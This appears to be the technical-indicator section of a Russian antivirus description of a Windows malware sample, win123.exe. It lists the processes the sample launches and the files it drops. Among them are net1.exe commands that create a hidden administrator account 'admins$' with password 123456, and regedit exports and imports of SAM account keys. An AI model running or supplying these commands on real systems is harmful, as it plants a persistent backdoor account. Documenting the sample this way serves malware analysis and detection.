Техническая информация
- <Текущая директория>\win123.exe
- %WINDIR%\regedit.exe /S "<Текущая директория>\11.reg"
- <SYSTEM32>\net1.exe user admins$ /del
- <SYSTEM32>\cmd.exe /c %TEMP%\kill.bat "<Текущая директория>\win123.exe"
- %WINDIR%\regedit.exe /S "<Текущая директория>\12.reg"
- <SYSTEM32>\net1.exe user admins$ 123456 /add
- <SYSTEM32>\cmd.exe /c %TEMP%\kill.bat "<Полный путь к вирусу>"
- %WINDIR%\regedit.exe /E "<Текущая директория>\12.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003ED
- %WINDIR%\regedit.exe /E "<Текущая директория>\11.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\admins$
- %TEMP%\kill.bat
- <Текущая директория>\11.reg
- <Текущая директория>\12.reg
- %TEMP%\E_4\krnln.fnr
- %TEMP%\E_4\shell.fne
- <Текущая директория>\win123.exe
- <Текущая директория>\win123.exe
- <Текущая директория>\12.reg
- <Текущая директория>\11.reg
- ClassName: 'RegEdit_RegEdit' WindowName: ''